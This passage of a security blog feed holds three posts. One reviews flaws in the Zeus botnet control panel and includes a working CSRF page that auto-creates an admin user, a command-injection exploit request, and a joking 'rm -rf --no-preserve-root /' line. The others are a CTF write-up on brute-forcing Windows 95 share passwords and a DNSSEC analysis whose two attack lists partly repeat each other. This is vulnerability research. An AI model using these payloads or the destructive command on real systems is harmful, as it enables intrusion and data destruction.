<li style="text-align: justify;"><a href="https://www.owasp.org/index.php/Testing_for_cookies_attributes_(OWASP-SM-002)">Missing HttpOnly flag on session cookie</a> - it could be nice if I could find any XSS. I need more time to find one!</li>
<li style="text-align: justify;"><a href="https://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005)">No CSRF protection</a> - except on the password change, where the old password is needed :-( boring</li>
</ul>
Update: You can use the CSRF to create a new user with admin privileges:<br />
<div>
<div>
<pre class="prettyprint linenums lang-html"><html>
<head>
<title></title>
</head>
<body>
<pre>
This is a CSRF POC to create a new admin user in Zeus admin panels.
Username: user_1392719246 Password: admin1
You might change the URL from 127.0.0.1.
Redirecting in a hidden iframe in <span id="countdown">10</span> seconds.
</pre>
<iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe>
<form action="http://127.0.0.1/cp.php?m=sys_users&amp;new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame">
<input name="name" type="hidden" value="user_1392719246" />
<input name="password" type="hidden" value="admin1" />
<input name="status" type="hidden" value="1" />
<input name="comment" type="hidden" value="PWND!" />
<input name="r_botnet_bots" type="hidden" value="1" />
<input name="r_botnet_scripts" type="hidden" value="1" />
<input name="r_botnet_scripts_edit" type="hidden" value="1" />
<input name="r_edit_bots" type="hidden" value="1" />
<input name="r_reports_db" type="hidden" value="1" />
<input name="r_reports_db_edit" type="hidden" value="1" />
<input name="r_reports_files" type="hidden" value="1" />
<input name="r_reports_files_edit" type="hidden" value="1" />
<input name="r_reports_jn" type="hidden" value="1" />
<input name="r_stats_main" type="hidden" value="1" />
<input name="r_stats_main_reset" type="hidden" value="1" />
<input name="r_stats_os" type="hidden" value="1" />
<input name="r_system_info" type="hidden" value="1" />
<input name="r_system_options" type="hidden" value="1" />
<input name="r_system_user" type="hidden" value="1" />
<input name="r_system_users" type="hidden" value="1" />
</form>
<script type="text/javascript">
window.onload=function(){
var counter = 10;
var interval = setInterval(function() {
counter--;
document.getElementById('countdown').innerHTML = counter;
if (counter == 0) {
redirect();
clearInterval(interval);
}
}, 1000);
};
function redirect() {
document.getElementById("csrf-form").submit();
}
</script>
</body>
</html>
</pre>
<ul>
<li style="text-align: justify;">MD5 password - the passwords stored in MySQL are MD5 passwords. No <a href="http://www.unlimitednovelty.com/2012/03/dont-use-bcrypt.html">PBKDF2, bcrypt, scrypt, salt</a>, whatever. MD5.</li>
<li style="text-align: justify;"><a href="http://www.contextis.com/research/tools/clickjacking-tool/">ClickJacking</a> - really boring stuff</li>
<li style="text-align: justify;">Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.</li>
<li style="text-align: justify;"><a href="https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)">SQLi</a> - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.</li>
</ul>
<br />
<h3>
Whats good news (for the C&C panel owners)</h3>
<br />
The following stuff looks good, at least some vulns were taken seriously:<br />
<ul>
<li>The system directory is protected with .htaccess deny from all.</li>
<li>gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can <a href="http://blog.threatexpert.com/2009/09/time-to-revisit-zeus-almighty.html">get the key</a> from the binary of this specific botnet (<a href="http://mnin.blogspot.be/2011/09/abstract-memory-analysis-zeus.html">another URL how to do this</a>). If you have the key, then you can fill the database with garbage, but that's all I can think of now.</li>
<li>Anti <a href="https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OWASP-DV-001)">XSS</a>: the following code is used almost everywhere</li>
<pre class="prettyprint lang-js">return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');</pre>
My evil thought was to inject malicious bot_id, but it looks like it has been filtered everywhere. Sad panda.</ul>
<br />
<h3>
What's really bad news (for the C&C panel owners)</h3>
<br />
And the best vuln I was able to find, <a href="https://www.owasp.org/index.php/Testing_for_Command_Injection_(OWASP-DV-013)">remote code execution</a> through command injection (happy panda), but only for authenticated users (sad panda).<br />
<br />
The vulnerable code is in system/fsarc.php:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ1Itjy6uJF86CpfyIJ_qQJ9i0FH63W4E0qHnWSkn2i06CGxHEOqLrCD1RG47jC19Aqe2_Ep406zigkl4nODObVKC8SuHCn2CXXyNFsPPDOwfoEzZvqAE2j1RG2N_x0Maw3MA3z_QAObLX/s1600/Zeus2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ1Itjy6uJF86CpfyIJ_qQJ9i0FH63W4E0qHnWSkn2i06CGxHEOqLrCD1RG47jC19Aqe2_Ep406zigkl4nODObVKC8SuHCn2CXXyNFsPPDOwfoEzZvqAE2j1RG2N_x0Maw3MA3z_QAObLX/s1600/Zeus2.png" width="400" /></a></div>
<pre class="prettyprint lang-php">function fsarcCreate($archive, $files){
...
$archive .= '.zip';
$cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';
exec($cli, $e, $r);
}</pre>
<br />
The exploit could not be simpler: <br />
<pre class="prettyprint lang-html">POST /cp.php?m=reports_files&path= HTTP/1.1
...
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1
</pre>
because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)<br />
Recommendation: use <a href="http://www.php.net/manual/en/function.escapeshellcmd.php">escapeshellcmd</a> next time.<br />
<br />
Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)<br />
<br />
That's all folks!<br />
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )<br />
<br />
<b>Update:</b> Looks like the gate.php is worth to investigate if you know the RC4 key. <a href="http://cybercrime-tracker.net/zeus.php">You can upload a PHP shell :)</a></div>
</div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com2tag:blogger.com,1999:blog-7429675726481888518.post-61923512552716416062014-02-02T12:11:00.000+01:002019-10-08T17:56:35.565+02:00Hacking Windows 95, part 1<div style="text-align: justify;">
During a CTF game, we came across very-very old systems. Turns out, it is not that easy to hack those dinosaur old systems, because modern tools like Metasploit do not have sploits for those old boxes and of course our "133t h4cking skillz" are useless without Metasploit... :)</div>
<br />
But I had an idea: This can be a pretty good small research for fun.<br />
<br />
<div style="text-align: justify;">
The rules for the hack are the following:</div>
<ol>
<li style="text-align: justify;">Only publicly available tools can be used for this hack, so no tool development. This is a CTF for script bunniez, and we can't haz code!</li>
<li style="text-align: justify;">Only hacks without user interaction are allowed (IE based sploits are out of scope).</li>
<li style="text-align: justify;">I need instant remote code execution. For example, if I can drop a malware to the c: drive, and change autoexec.bat, I'm still not done, because no one will reboot the CTF machine in a real CTF for me. If I can reboot the machine, that's OK.</li>
<li style="text-align: justify;">I don't have physical access.</li>
</ol>
<div style="text-align: justify;">
I have chosen Windows 95 for this task. First, I had to get a genuine Windows 95 installer, so I visited the Microsoft online shop and downloaded it from their official site.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I installed it in a virtualized environment (remember, you need a boot floppy to install from the CD), and it hit me with a serious nostalgia bomb after watching the installer screens. "Easier to use", "faster and more efficient", "high-powered performance", "friendly", "intuitive interface". Who does not want that? :)</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg67rIoyjbrtBfvwve9eYUNobstAG02_aes_FeZqCWgihpJcvwW0XCo6HnCIvKfB2aIK75atpZEu72FcAafftDLvRt72x9ulHPCGyIRry3KFMFoqrcDLs5Jvol73e1UXVZPlBUxJyYDzOm3/s1600/win95_01.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg67rIoyjbrtBfvwve9eYUNobstAG02_aes_FeZqCWgihpJcvwW0XCo6HnCIvKfB2aIK75atpZEu72FcAafftDLvRt72x9ulHPCGyIRry3KFMFoqrcDLs5Jvol73e1UXVZPlBUxJyYDzOm3/s1600/win95_01.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiboDeQZ-NswVumO6-d-apcYEClHjOC0bsEAXfhNopsnu3hgrcTcJ0ukWrMiK8ViSIuO79frAq_jQlD66Ae0yirD0GGAA998Gei2VzNRU_IKkGcrMFhs5DGtK1oz92VvWSgfo1Ae8MFyxAl/s1600/win95_02.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="297" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiboDeQZ-NswVumO6-d-apcYEClHjOC0bsEAXfhNopsnu3hgrcTcJ0ukWrMiK8ViSIuO79frAq_jQlD66Ae0yirD0GGAA998Gei2VzNRU_IKkGcrMFhs5DGtK1oz92VvWSgfo1Ae8MFyxAl/s1600/win95_02.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgG8Dvx8-roEfuS-cSmwAVK1cRERRXPYHGzX3226a1Fp8l23G7tHAdNWW_UAtC8-AEONYrvyhrV2N4aVoGRU-Xm61Jvwb1D9Wb2e9LjEuL4jlVRFMffH79-4aMHZM_ubQJx-KNVfO9wOtlp/s1600/win95_03.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgG8Dvx8-roEfuS-cSmwAVK1cRERRXPYHGzX3226a1Fp8l23G7tHAdNWW_UAtC8-AEONYrvyhrV2N4aVoGRU-Xm61Jvwb1D9Wb2e9LjEuL4jlVRFMffH79-4aMHZM_ubQJx-KNVfO9wOtlp/s1600/win95_03.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOuLGA5ekSgFA69qQ5hJxN4OLd1nHNaE0YT6jkazvaJkLuWcqfmSCLWx3yAYNFia-IZURRuFVtqqb5jKefcTnMvmQtzTcF4v7b0IBhCLTGJWgkojzVwEXExDRdETZm-_DLB19STn38Z_WA/s1600/win95_04.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOuLGA5ekSgFA69qQ5hJxN4OLd1nHNaE0YT6jkazvaJkLuWcqfmSCLWx3yAYNFia-IZURRuFVtqqb5jKefcTnMvmQtzTcF4v7b0IBhCLTGJWgkojzVwEXExDRdETZm-_DLB19STn38Z_WA/s1600/win95_04.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3W0NRVYxSBDhGRXq1hDTAQPPO0-cbBTs8e6HRBERBLXEcwZkPPIwtsUTsoNJYBO4mfpax1ffVGOp5qVCa9WqzF_MQE4qQiUPahYgVfjPaDeGtHZLIY-JqGheyrYGny-BVsci6cO64O18h/s1600/win95_05.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="297" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3W0NRVYxSBDhGRXq1hDTAQPPO0-cbBTs8e6HRBERBLXEcwZkPPIwtsUTsoNJYBO4mfpax1ffVGOp5qVCa9WqzF_MQE4qQiUPahYgVfjPaDeGtHZLIY-JqGheyrYGny-BVsci6cO64O18h/s1600/win95_05.png" width="400" /></a></div>
<br />
<div style="text-align: justify;">
Now that I have a working Windows 95 box, setting up the TCP/IP is easy, let's try to hack it!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
My first tool is always nmap. Let's scan the box! Below I'm showing the interesting parts from the result:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<pre class="prettyprint linenums lang-html">PORT STATE SERVICE VERSION
139/tcp open netbios-ssn
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
Running: Microsoft Windows 3.X|95
OS details: Microsoft Windows for Workgroups 3.11 or Windows 95
TCP Sequence Prediction: Difficulty=25 (Good luck!)
IP ID Sequence Generation: Broken little-endian incremental
</pre>
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The first exciting thing to note is that there is no port 445! Port 445 is only since NT 4.0. If you check all the famous windows sploits (e.g., MS03-026, MS08-067), all of them use port 445 and named pipes. But there are no named pipes on Windows 95!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Because I'm a Nessus monkey, let's run a free Nessus scan on it!<br />
<br /></div>
<div style="text-align: justify;">
Only one critical vulnerability found:</div>
<div style="text-align: justify;">
Microsoft Windows NT 4.0 Unsupported Installation Detection</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Thanks for nothing, Nessus! But at least it was for free.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Next, I tried GFI Languard, nothing. It detected the machine as Win95, the opened TCP port, and some UDP ports as open (false-positive), and that's all...</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Let's try another free vulnerability scanner tool, Nexpose. The results are much better:</div>
<ul>
<li style="text-align: justify;">CIFS NULL Session Permitted<span class="Apple-tab-span" style="white-space: pre;"> </span> </li>
<li style="text-align: justify;">Weak LAN Manager hashing permitted<span class="Apple-tab-span" style="white-space: pre;"> </span></li>
<li style="text-align: justify;">SMB signing not required<span class="Apple-tab-span" style="white-space: pre;"> </span></li>
<li style="text-align: justify;">Windows 95/98/ME Share Level Password Bypass<span class="Apple-tab-span" style="white-space: pre;"> </span> </li>
<li style="text-align: justify;">TCP Sequence Number Approximation Vulnerability<span class="Apple-tab-span" style="white-space: pre;"> </span> </li>
<li style="text-align: justify;">ICMP netmask response<span class="Apple-tab-span" style="white-space: pre;"> </span></li>
<li style="text-align: justify;">CIFS Share Readable By Everyone</li>
</ul>
<div style="text-align: justify;">
I think the following vulnerabilities are useless for me at the moment:</div>
<ul>
<li style="text-align: justify;">Weak LAN Manager hashing permitted - without user interaction or services looking at the network, useless (I might be wrong here, will check this later)<span class="Apple-tab-span" style="white-space: pre;"> </span></li>
<li style="text-align: justify;">TCP Sequence Number Approximation Vulnerability - not interesting</li>
<li style="text-align: justify;">ICMP netmask response<span style="white-space: pre;"> </span>- not interesting</li>
<li style="text-align: justify;">CIFS Share Readable By Everyone - unless there is a password in a text file, useless</li>
</ul>
<div style="text-align: justify;">
But we have two interesting vulns:</div>
<ul>
<li style="text-align: justify;">CIFS NULL Session Permitted<span class="Apple-tab-span" style="white-space: pre;"> </span> - this could be interesting, I will check this later ...</li>
<li style="text-align: justify;">Windows 95/98/ME Share Level Password Bypass - BINGO!</li>
</ul>
<div>
<div style="text-align: justify;">
Let me quote Nexpose here:</div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
"3.2.3 Windows 95/98/ME Share Level Password Bypass (CIFS-win9x-onebyte-password)</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
A flaw in the Windows 95/98/ME File and Print Sharing service allows unauthorized users to access file and print shares by sending the first character of the password. Due to the limited number of attempts required to guess the password, brute force attacks can be performed in just a few seconds.</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
Established connection to share TEST with password P."</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div style="text-align: justify;">
The vulnerability description at MS side:</div>
<div style="text-align: justify;">
<a href="http://technet.microsoft.com/en-us/security/bulletin/ms00-072">http://technet.microsoft.com/en-us/security/bulletin/ms00-072</a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
For example if the password is "Password" (without quotes) and the client sends the password "P" (without quotes) and the length of 1, the client is authenticated. To find the rest of the password, the attacker increments the length to 2 and starts guessing the second letter until he reaches "PA" and gets authenticated again. As share passwords in Windows 95 are not case sensitive, "Pa" and "PA" will also be accepted. The attacker can continue to increment the length and guessing the next letter one-by-one until he gets the full "PASSWORD" (as the maximum length is 8 characters).<br />
<br />
I believe all characters between ALT+033 and ALT+255 can be used in the share password in Windows 95, but as it is case insensitive, we have 196 characters to use, and a maximum length of 8 characters. In worst case this means that we can guess the full password in 1568 requests. The funny thing is that the share password is not connected to (by default) any username/account, and it cannot be locked via brute force.</div>
<br />
<div style="text-align: justify;">
Luckily there is a great tool which can exploit this vulnerability:</div>
<div style="text-align: justify;">
<a href="http://www.securityfriday.com/tools/SPC.html">Share Password Checker</a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Let's check this tool in action:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_tBBvO4OUGeaJ7h7FT0hPBQetOM9-bpJtxXFHk-YeVBqFiyzPt0PSiDtw6I7fcgW5tpMs2Lc-zCOhwOkWLNktdaNkzDpfC2KhW1sUn3LYQZbcuo-FjU7v4IwfKyk_k_oC9NTqRr-VkIyw/s1600/spc_hack.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_tBBvO4OUGeaJ7h7FT0hPBQetOM9-bpJtxXFHk-YeVBqFiyzPt0PSiDtw6I7fcgW5tpMs2Lc-zCOhwOkWLNktdaNkzDpfC2KhW1sUn3LYQZbcuo-FjU7v4IwfKyk_k_oC9NTqRr-VkIyw/s1600/spc_hack.png" width="320" /></a></div>
<br />
<div style="text-align: justify;">
W00t w00t, it brute forced the password in less then 2 seconds!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Looking at a wireshark dump we can see how it is done:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhcnKe5gR6dFALtUgOlvYo3iKLzKIfDhnGj3xho47wkKTFam2mWcj9D2Z2DeFE2gJHJc3-IvhtOEQw-c6GWEipfjSL1knjwmw3Bnd4HlerphWhAab9DCOodX7BN6C_n0hwD1fcvNTGfUlW/s1600/wireshark.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="321" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhcnKe5gR6dFALtUgOlvYo3iKLzKIfDhnGj3xho47wkKTFam2mWcj9D2Z2DeFE2gJHJc3-IvhtOEQw-c6GWEipfjSL1knjwmw3Bnd4HlerphWhAab9DCOodX7BN6C_n0hwD1fcvNTGfUlW/s1600/wireshark.png" width="400" /></a></div>
<br />
<div style="text-align: justify;">
As you can see, in the middle of the dump we can see that it already guessed the part "PASS" and it is brute-forcing the fifth character, it founds that "W" is the correct fifth character, and starts brute-forcing the sixth character.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
If we are lucky with the CTF, the whole C:\ drive is shared with full read-write access, and we can write our team identifier into the c:\flag.txt. But what if we want remote code execution? Stay tuned, this is going to be the topic of the <a href="http://jumpespjump.blogspot.hu/2014/05/hacking-windows-95-part-2.html">next part of this post</a>.</div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com0tag:blogger.com,1999:blog-7429675726481888518.post-89750000973737991112014-01-25T13:47:00.000+01:002019-10-08T17:55:35.615+02:00DNSSEC, from an end-user perspective, part 3<div style="text-align: justify;">
In the <a href="http://jumpespjump.blogspot.hu/2013/12/dnssec-from-end-user-perspective-part-1.html" target="_blank">first post</a> of this DNSSEC series, I have shown the problem (DNS vulnerabilities), and in the <a href="http://jumpespjump.blogspot.hu/2014/01/dnssec-from-end-user-perspective-part-2.html" target="_blank">second post</a>, the "solution." In this third post, I am going to analyze DNSSEC. Can DNSSEC protect the users against all of the attacks? Or just part of them? What about corner cases?</div>
<br />
The following list are the attack types from the <a href="http://jumpespjump.blogspot.hu/2013/12/dnssec-from-end-user-perspective-part-1.html" target="_blank">first post</a>, where DNSSEC <u><b>can</b></u> protect the users:<br />
<br />
<ul>
<li>DNS cache poisoning the DNS server, "Da Old way"</li>
<li>DNS cache poisoning, "<a href="http://www.iana.org/about/presentations/davies-viareggio-entropyvuln-081002.pdf" target="_blank">Da Kaminsky way</a>"</li>
<li>ISP hijack, for advertisement or spying purposes</li>
<li>Captive portals</li>
<li>Pentester hijacks DNS to test application via active man-in-the-middle</li>
<li>Malicious attacker hijacks DNS via active MITM</li>
</ul>
<br />
The following list are the attack types from the <a href="http://jumpespjump.blogspot.hu/2013/12/dnssec-from-end-user-perspective-part-1.html" target="_blank">first post</a>, where DNSSEC <u style="font-weight: bold;">cannot</u> protect the users:<br />
<br />
<ul>
<li>Rogue DNS server set via malware</li>
<li>Having access to the DNS admin panel and rewriting the IP</li>
<li>ISP hijack, for advertisement or spying purposes</li>
<li>Captive portals</li>
<li>Pentester hijacks DNS to test application via active man-in-the-middle</li>
<li>Malicious attacker hijacks DNS via active MITM</li>
</ul>
<br />
<div style="text-align: justify;">
If you are a reader who thinks while reading, you might say "What the hell? Am I protected or not???". The problem is that it depends… In the case where the attacker is between you and your DNS server, the attacker can impersonate the DNS server, downgrade it to a non DNSSEC aware one, and send responses without DNSSEC information.</div>
<div>
<br /></div>
<div>
Now, how can I protect against all of these attacks? Answer is "simple":</div>
<div>
<ol>
<li>Configure your own DNSSEC aware server on your localhost, and use that as a resolver. This is pretty easy, even I was able to do it <a href="http://www.howtoforge.com/configuring-dnssec-on-bind9-9.7.3-on-debian-squeeze-ubuntu-11.10" target="_blank">using tutorials</a>.</li>
<li>Don't let malware run on your system! ;-)</li>
<li>Use at least two-factor authentication for admin access of your DNS admin panel.</li>
<li>Use a registry lock (details in <a href="http://jumpespjump.blogspot.hu/2013/12/dnssec-from-end-user-perspective-part-1.html" target="_blank">part 1</a>).</li>
<li>Use a DNSSEC aware OS.</li>
<li>Use DNSSEC protected websites.</li>
<li>There is a need for an API or something, where the client can enforce DNSSEC protected answers. In case the answer is not protected with DNSSEC, the connection can not be established.</li>
</ol>
<div>
<div>
<br /></div>
<div>
Now some random facts, thoughts, solutions around DNSSEC:</div>
<div>
<ul>
<li>Did you know .SE signed its zone with DNSSEC in September 2005, as the first TLD in the world?</li>
<li>Did you know DNSSEC was first deployed at the root level on July 15, 2010?</li>
<li>Did you know <a href="https://xs.powerdns.com/dnssec-nl-graph/" target="_blank">.NL become the first TLD to pass 1 million DNSSEC-signed domain names</a>?</li>
<li>Did you know that <a href="http://deneb.iszt.hu/dnssec-hu/" target="_blank">Hungary is in the testing phase of DNSSEC</a> (watch out, it is Hungarian)?</li>
<li>Did you know that <a href="https://addons.mozilla.org/en-us/firefox/addon/dnssec-validator/" target="_blank">you can also use and test that cool DNSSEC validator</a>?</li>
<li>Did you know that <a href="http://www.opendns.com/about/innovations/dnscrypt/" target="_blank">there are alternative solutions like DNSCrypt</a>?</li>
<li>Did you know that in the future you might be able to enforce <a href="http://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security" target="_blank">HSTS</a> via DNSSEC?</li>
<li>Did you know that in the future you might be able to use <a href="http://en.wikipedia.org/wiki/DNS-based_Authentication_of_Named_Entities" target="_blank">certificate pinning via DNSSEC</a>?</li>
</ul>
</div>
</div>
<div>
<br /></div>
That's all folks, happy DNSSEC configuring ;-)</div>
<div>
<br /></div>
<div style="text-align: justify;">
<b>Note from David</b>:</div>
<div style="text-align: justify;">
Huh, I have just accidentally deleted this whole post from Z, but then I got it back from my browsing cache. Big up to Nir Sofer for his <a href="http://www.nirsoft.net/utils/chrome_cache_view.html" target="_blank">ChromeCacheView</a> tool! Saved my ass from kickin'! :D</div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com2